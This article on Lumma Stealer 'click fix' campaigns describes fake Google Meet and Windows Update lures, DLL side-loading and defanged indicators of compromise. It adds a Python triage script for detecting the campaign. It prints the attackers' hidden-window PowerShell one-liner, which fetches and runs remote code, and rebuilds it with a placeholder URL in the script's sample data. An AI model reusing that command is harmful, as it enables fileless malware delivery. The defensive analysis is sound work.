Recent Palo Alto Networks research has documented the ongoing evolution of “click fix” style campaigns used to distribute the Lumma Stealer malware.
These campaigns depend on user interaction: the malicious web page silently copies a script into the victim’s clipboard (the copy-paste buffer) and then tricks the victim into running it.
The “click fix” distribution method uses web pages that display step-by-step instructions telling the user to open the Windows Run dialog, paste the PowerShell command already sitting in their clipboard, and press Enter. Because the victim types nothing themselves and the page impersonates a legitimate service, the technique trades on user trust and rarely raises suspicion.
Attackers are continuously refining their methods to evade detection and increase the success rate of these campaigns. Recent developments include:
- Domain Impersonation: Registering domain names that mimic legitimate services to gain user trust (e.g., windows-update[.]site).
- Abuse of Trusted Platforms: Hosting malicious pages on reputable platforms like Google Sites, so the URL the victim sees belongs to a well-known provider.
- PowerShell Script Delivery: Serving files that mix ASCII text with binary data; the text portion is a PowerShell script, and PowerShell runs it even though the file does not look like a script.
- DLL Side-Loading: Distributing zip archives that bundle decoy files with a legitimate, signed executable, which loads the Lumma Stealer DLL placed beside it.
The campaigns demonstrate ongoing evolution in the attackers’ methods as they attempt to evade detection while maintaining effectiveness across multiple distribution channels.
Malicious Activity
Example 1: Fake Google Meet Page
A fake Google Meet page hosted on sites.google[.]com instructs users to run a PowerShell command that downloads and executes a script from tlgrm-redirect[.]icu. The infection process involves:
- Downloading a zip archive (plsverif[.]cfd/1.zip) containing Lumma Stealer files.
- Extracting and executing a DLL (DuiLib_u.dll) via side-loading.
Example 2: Fake Windows Update Site
The site windows-update[.]site prompts users to execute a PowerShell command that downloads a file (overcoatpassably[.]shop/Z8UZbPyVpGfdRS/maloy[.]mp4). Despite the .mp4 extension, this file contains ASCII text and binary data and runs as a PowerShell script.
The PowerShell commands used in these campaigns are crafted to hide their intent from a casual glance. For example:

```powershell
powershell -w hidden -c "$a='[base64 text removed]'; $b=[Convert]::FromBase64String($a); $c=[System.Text.Encoding]::UTF8.GetString($b); Invoke-Expression (Invoke-WebRequest -Uri $c).Content"
```

The command runs with a hidden window (-w hidden). The Base64 string does not contain the malicious script itself; it decodes to the URL of the next stage ($c). Invoke-WebRequest then fetches that URL and Invoke-Expression executes the downloaded content directly in memory, so no script file is written to disk at this step.
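The following triage helper is an added example written for this article; it is not code from the Palo Alto Networks research or from any product. It takes process-creation records of the shape Sysmon Event ID 1 provides (Image, ParentImage, CommandLine), flags the combination of features seen in the command above (hidden window, Base64 decode, web fetch, Invoke-Expression, parent process explorer.exe because the Run dialog is hosted by Explorer), and decodes any quoted Base64 literal so the analyst can read the hidden URL without running the script. It goes slightly beyond the page’s single command by also matching the iwr/iex aliases and the spelled-out -WindowStyle form. The sample records and the placeholder URL are constructed; the page’s own Base64 text was removed from the original write-up.

```python
import base64
import re

# Each pattern alone is common in legitimate scripts. The combination of
# several in one command line (hidden window + Base64 decode + web fetch +
# Invoke-Expression) is what matches the campaign's one-liner.
INDICATORS = {
    # powershell.exe accepts any prefix of -WindowStyle (-w, -win, ...);
    # the enum value may also be given numerically (Hidden = 1).
    "hidden_window": re.compile(r"-w[a-z]*\s+(?:hidden|1)\b", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "web_fetch": re.compile(
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString", re.I
    ),
    "inline_eval": re.compile(r"Invoke-Expression|\biex\b", re.I),
}

# A quoted Base64 literal of at least 16 characters, as in $a='...'.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def decode_literals(cmdline):
    """Decode every quoted Base64 literal that yields printable UTF-8 text.
    In the campaign's command that text is the URL of the next stage."""
    decoded = []
    for m in B64_LITERAL.finditer(cmdline):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64 or not text: ignore
        if text.isprintable():
            decoded.append(text)
    return decoded


def triage(event):
    """Score one process-creation record (dict with Image, ParentImage,
    CommandLine) and return the matched indicators and recovered URLs."""
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    urls = [s for s in decode_literals(cmd) if re.match(r"https?://", s, re.I)]
    # A command pasted into Win+R is launched by explorer.exe, so a
    # PowerShell child of explorer.exe matches the "paste into Run" step.
    from_run_dialog = (
        event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe"))
        and event.get("ParentImage", "").lower().endswith("explorer.exe")
    )
    return {
        "hits": hits,
        "urls": urls,
        "from_run_dialog": from_run_dialog,
        "suspicious": len(hits) >= 3 or (from_run_dialog and len(hits) >= 2),
    }


# Constructed sample records (not real telemetry). The URL is a placeholder
# standing in for the Base64 text removed from the original command.
SAMPLE_URL = "http://redirect.example/1.txt"
SAMPLE_B64 = base64.b64encode(SAMPLE_URL.encode()).decode()
SAMPLE_EVENTS = [
    {  # same shape as the campaign's command, pasted into the Run dialog
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": (
            f"powershell -w hidden -c $a='{SAMPLE_B64}'; "
            "$b=[Convert]::FromBase64String($a);"
            "$c=[System.Text.Encoding]::UTF8.GetString($b);"
            "Invoke-Expression (Invoke-WebRequest -Uri $c).Content"
        ),
    },
    {  # benign admin task that also decodes Base64: no hidden window, no IEX
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": (
            "powershell -NoProfile -c [IO.File]::WriteAllBytes("
            "'C:\\tmp\\cert.der',[Convert]::FromBase64String('MIIB...'))"
        ),
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

The decoded URL is the pivot an analyst wants first: it identifies the stage-two host to block and to search for in proxy logs, which the raw Base64 in the command line never reveals.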
Malicious traffic patterns observed during infections include:
- HTTP POST requests to tlgrmverif[.]cyou/log.php, reporting successful execution of each stage back to the attacker.
- Downloads from domains like plsverif[.]cfd and overcoatpassably[.]shop.
Active Lumma Stealer C2 Domains
Active command-and-control (C2) domains for Lumma Stealer include:
- web-security3[.]com
- techspherxe[.]top
Inactive C2 domains that no longer resolve include:
- hardswarehub[.]today
- earthsymphzony[.]today
Key files associated with these campaigns include:
- A PowerShell script retrieved from tlgrm-redirect[.]icu/1.txt (SHA256: 909ed8a135…).
- A zip archive containing Lumma Stealer files (plsverif[.]cfd/1.zip, SHA256: 0608775a345…).
- A DLL side-loaded by a legitimate EXE (DuiLib_u.dll, SHA256: b3e8b610ef…).
Indicators of Compromise
Active Domains Hosting Malicious Pages
- windows-update[.]site (registered February 19, 2025)
- sites[.]google[.]com/view/get-access-now-test/verify-your-account
Associated Domains
Domains linked to these campaigns include:
- authentication-safeguard[.]com (registered January 17, 2025)
- plsverif[.]cfd (registered March 1, 2025)
- tlgrmverif[.]cyou (registered January 11, 2025)
The evolving tactics in these “click fix” campaigns show how much effort goes into modern malware distribution.
By hosting lures on trusted platforms, registering look-alike domains, and hiding the download URL behind Base64 and in-memory execution, attackers are getting past defenses that key on a malicious file or an obviously malicious domain.
Organizations should treat a PowerShell process launched from the Run dialog with a hidden window as a strong signal, block the domains listed above, and teach users that no legitimate service will ever ask them to paste a command into Windows to “verify” or “fix” anything.